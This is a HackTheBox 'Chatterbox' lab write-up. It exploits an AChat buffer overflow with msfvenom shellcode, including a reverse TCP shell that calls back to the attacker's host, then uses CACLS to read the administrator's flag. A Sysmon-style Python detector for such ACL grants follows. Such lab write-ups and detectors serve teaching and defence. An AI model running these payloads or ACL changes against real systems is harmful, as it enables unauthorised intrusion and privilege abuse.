
[HackTheBox] Chatterbox

I started off the box with an nmap scan on the target machine.

nmap -sS -sV -A 10.10.10.74

Nmap scan report for 10.10.10.74
Host is up (0.23s latency).
All 1000 scanned ports on 10.10.10.74 are filtered
Too many fingerprints match this host to give specific OS details

As you can see from above, we didn’t see anything in the first 1000 ports. On HackTheBox this usually means that there are services running on uncommon ports (I’ve seen SSH at port 65535 before) so I decided to run a more thorough scan on the target machine.

Upon running my next scan, I found two services running on ports 9255 and 9256.

nmap -p 1000-10000 -sV -sS -T4 10.10.10.74

Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-22 19:34 EDT
Nmap scan report for 10.10.10.74
Host is up (0.30s latency).
Not shown: 8999 filtered ports

PORT     STATE SERVICE
9255/tcp open  mon
9256/tcp open  unknown

Nmap was unable to detect what services were running on these two ports. This could mean two things (at least for HackTheBox):

  • The service was messed up by another user.
  • You are supposed to enumerate more.

A quick Google search returned nothing for port 9255, but for port 9256 there was a known vulnerability in a service called AChat: an “SEH-based stack buffer overflow.” Using this knowledge in conjunction with the box name “Chatterbox”, I knew that this was the port to start my attack on.

The link above references two pages; one of them is a Metasploit module for this exploit. However, a quick search on Exploit-DB showed that a Python exploit was also available, which I decided to leverage instead.

In the background, I ran a version scan against just those two ports to see if we could get more information about the host, and to my surprise it actually returned the services the ports were running.

nmap -sS -sV -Pn -A -T4 -p 9255,9256 10.10.10.74

Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-22 19:43 EDT
Nmap scan report for 10.10.10.74
Host is up (0.24s latency).

PORT     STATE SERVICE VERSION
9255/tcp open  http    AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp open  achat   AChat chat system

With my theory confirmed, I decided to move on with the exploit.

A quick look at the Python exploit shows comments left by the author on how to use it and how to generate a payload to go with it. (The author's example spawns a calculator.)

msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

I modified mine slightly to create a reverse TCP shell back to my virtual machine, as shown below.

msfvenom -a x86 --platform Windows -p windows/shell/reverse_tcp RHOST=10.10.10.74 LHOST=10.10.14.85 LPORT=8888 exitfunc=thread -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

With the payload ready to go, all I had to do was set up a multi/handler listener in Metasploit to (hopefully) gain a shell on the system.

As expected, the payload ran fine and I was able to get a Meterpreter shell. I then navigated to the user directory to get the user flag.

msf exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
chatterbox\alfred

C:\Users\Alfred\Desktop>type user.txt
72----------------------------34

After getting stuck on privilege escalation, I learned about a method where you change the permissions of a file using CACLS. Using this technique, I changed the permissions on the root.txt flag and read it directly as my current user.

C:\Users\Administrator\Desktop>CACLS root.txt /E /G "alfred":R
CACLS root.txt /E /G "alfred":R
processed file: C:\Users\Administrator\Desktop\root.txt

C:\Users\Administrator\Desktop>type root.txt
type root.txt
a6----------------------------7c
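From the defender's side, the CACLS step above is exactly what you want to catch: an ACL grant on a file inside another user's profile, run by the account that benefits from it. The following is an added example, not part of the original writeup, that runs that check over a few constructed process-creation events (field layout borrowed from Sysmon Event ID 1; the event format and the privileged-account list are assumptions to be tuned per environment).

```python
import ntpath
import re

# Constructed sample events, one per line, in the shape of Sysmon Event ID 1 fields:
#   UtcTime | User | CurrentDirectory | CommandLine   (all values are made up)
SAMPLE_EVENTS = r"""
2018-03-22 23:50:01 | CHATTERBOX\alfred | C:\Users\Administrator\Desktop | CACLS root.txt /E /G "alfred":R
2018-03-22 23:50:40 | CHATTERBOX\alfred | C:\Users\Administrator\Desktop | type root.txt
2018-03-22 23:51:02 | NT AUTHORITY\SYSTEM | C:\Windows\system32 | icacls C:\ProgramData\app /grant Users:(RX)
2018-03-22 23:52:15 | CHATTERBOX\alfred | C:\Users\alfred | icacls C:\Users\Administrator\Desktop\root.txt /grant alfred:F
2018-03-22 23:53:09 | CHATTERBOX\alfred | C:\Users\alfred\Desktop | cacls notes.txt /E /G alfred:F
"""

# Assumption: accounts that are expected to edit ACLs; tune this per environment.
PRIVILEGED = {r"nt authority\system", r"chatterbox\administrator"}

ACL_TOOL_RE = re.compile(r'^"?(?:[^"\s]*\\)?(?:cacls|icacls|xcacls)(?:\.exe)?"?\s+(.*)$', re.I)
GRANT_FLAG_RE = re.compile(r'(?:^|\s)/(?:G|P|grant(?::r)?|setowner)(?=\s|$)', re.I)  # rights-changing switches
PROFILE_RE = re.compile(r'^[A-Z]:\\Users\\([^\\]+)\\', re.I)                         # which profile a path lives in

def target_path(args, cwd):
    """First non-switch argument, resolved against the process's working directory."""
    tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', args)]
    for tok in tokens:
        if not tok.startswith("/"):
            return ntpath.normpath(ntpath.join(cwd, tok))
    return None

def check_event(line):
    """Return (severity, time, user, path, reason) for an ACL change worth a look, else None."""
    ts, user, cwd, cmdline = (f.strip() for f in line.split("|", 3))
    m = ACL_TOOL_RE.match(cmdline)
    if not m or not GRANT_FLAG_RE.search(m.group(1)):
        return None                                   # not a grant/replace of rights
    path = target_path(m.group(1), cwd)
    owner = PROFILE_RE.match(path or "")
    actor = user.split("\\")[-1].lower()
    if owner and owner.group(1).lower() != actor:
        return ("HIGH", ts, user, path, "ACL grant on a file inside another user's profile")
    if user.lower() not in PRIVILEGED:
        return ("MEDIUM", ts, user, path, "ACL change by a non-privileged account")
    return None

def scan(text):
    return [hit for hit in (check_event(l) for l in text.strip().splitlines()) if hit]

if __name__ == "__main__":
    for sev, ts, user, path, why in scan(SAMPLE_EVENTS):
        print(f"[{sev}] {ts} {user} -> {path}: {why}")
```

Relative targets are resolved against the logged working directory, which is what exposes the first event: `root.txt` on its own looks harmless until it is joined with `C:\Users\Administrator\Desktop`.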

This was a fairly simple box, but I learned a bit about CACLS and how it can be leveraged (which I can hopefully use in the future!).
